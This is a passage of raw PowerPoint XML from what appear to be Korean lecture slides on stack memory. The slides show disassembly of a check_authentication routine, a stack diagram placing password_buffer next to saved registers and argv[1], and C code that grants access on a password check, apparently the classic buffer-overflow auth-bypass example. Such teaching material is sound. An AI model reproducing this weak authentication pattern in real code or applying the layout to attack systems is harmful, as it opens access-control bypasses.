                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monaco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ECAED1-F650-DA42-ADB8-D4B0236CA9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10507718" y="-63423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42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8355724" cy="6467036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048474 &lt;+0&gt;:	push   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0x08048475 &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%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500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048477 &lt;+3&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi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500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048478 &lt;+4&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="15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0x08048479 &lt;+5&gt;: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>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sub    $0x1c,%esp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0x0804847c &lt;+8&gt;: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0x08048483 &lt;+15&gt;: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0x0804848a &lt;+22&gt;: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$0x0,-0x18(%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0x08048491 &lt;+29&gt;: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$0x0,-0x14(%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0x08048498 &lt;+36&gt;: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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0x10(%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0x0804849f &lt;+43&gt;: mov    0x8(%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),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x080484a2 &lt;+46&gt;: mov    %eax,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" b="1" dirty="0">
              <a:latin typeface="Monac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53905" y="5798159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317416" y="74893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A8DFE-8EA2-9749-8FCF-18A15D0BD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="5482934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check_auth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423F4-D4E4-5440-88D6-59F99253F98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="48299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edi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B4472-EEE3-AB4F-AC85-D890C5ABC7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="4176956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esi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85B827-2DD9-394C-A83B-2BD8EF5EA0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668812" y="3525682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8407-4AEC-F440-BDAA-E21825577F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668811" y="2872693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F9A6BB-326D-1341-9D2F-7E19750216D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668810" y="222141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C42A-DE46-F54C-BF11-D02790E8B74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="15701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14BA2-A3F1-6142-AE4A-7E7C892B9B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="3665796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7214B-54B8-A541-936E-00C94CB5CFD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="300753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$0x10(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AC86B-20F8-8142-BDC2-F9806A32682B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="2349280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$0x14(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CF65C-4170-E54A-8D14-FBF353517D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="1691022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$0x18(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EBEA9A-7766-BD4F-9963-9C3C8E954DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="91887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B329E-41D7-6C47-9B16-E72E0FADA509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="103974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7351FF-C001-2A4F-B221-AEBBCD4FA9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="526747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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>[1]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742896-0EA4-2C45-801D-24207C129859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="117125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292EB-4EE7-054C-B5B8-B51DC7AF8B43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="413640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atin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monaco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ECAED1-F650-DA42-ADB8-D4B0236CA9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10507718" y="-63423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7031415" cy="6467036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="13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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x080484b1 &lt;+61&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>lea -0x1c(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484b4 &lt;+64&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx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0x080484b6 &lt;+66&gt;:	mov    $0x8048660,%eax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0x080484bb &lt;+71&gt;:	mov    $0x8,%ecx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0x080484c0 &lt;+76&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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0x080484c2 &lt;+78&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi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0x080484c4 &lt;+80&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>repz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> %es:(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%ds:(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" b="1" dirty="0">
              <a:latin typeface="Monac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53905" y="5798159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317416" y="74893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A8DFE-8EA2-9749-8FCF-18A15D0BD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="5482934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check_auth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423F4-D4E4-5440-88D6-59F99253F98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="48299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edi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B4472-EEE3-AB4F-AC85-D890C5ABC7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="4176956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esi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85B827-2DD9-394C-A83B-2BD8EF5EA0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668812" y="3525682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8407-4AEC-F440-BDAA-E21825577F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668811" y="2872693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F9A6BB-326D-1341-9D2F-7E19750216D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668810" y="222141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C42A-DE46-F54C-BF11-D02790E8B74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="15701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14BA2-A3F1-6142-AE4A-7E7C892B9B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="3665796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7214B-54B8-A541-936E-00C94CB5CFD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="300753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$0x10(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AC86B-20F8-8142-BDC2-F9806A32682B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="2349280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$0x14(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CF65C-4170-E54A-8D14-FBF353517D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="1691022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$0x18(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EBEA9A-7766-BD4F-9963-9C3C8E954DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="91887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B329E-41D7-6C47-9B16-E72E0FADA509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="103974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7351FF-C001-2A4F-B221-AEBBCD4FA9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="526747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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>[1]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742896-0EA4-2C45-801D-24207C129859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="117125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292EB-4EE7-054C-B5B8-B51DC7AF8B43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="413640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atin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>password_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monaco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ECAED1-F650-DA42-ADB8-D4B0236CA9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10507718" y="-63423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29D2C1-B493-6A4B-B7FC-82DEC3C4C6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616456" y="1050354"/>
            <a:ext cx="122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password_buffer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C1A0D-C1F9-2244-8E4B-F1D4ECD3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"/>
            <a:ext cx="10515600" cy="60306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int main(int </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> &lt; 2){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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: %</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>s &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>패스워드</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>n", </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[0]);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exit(0);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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1])){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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("\n---------------------\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("       </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>접근 허용</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("\n---------------------\n");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} else{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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("\n</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>접근 불가</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
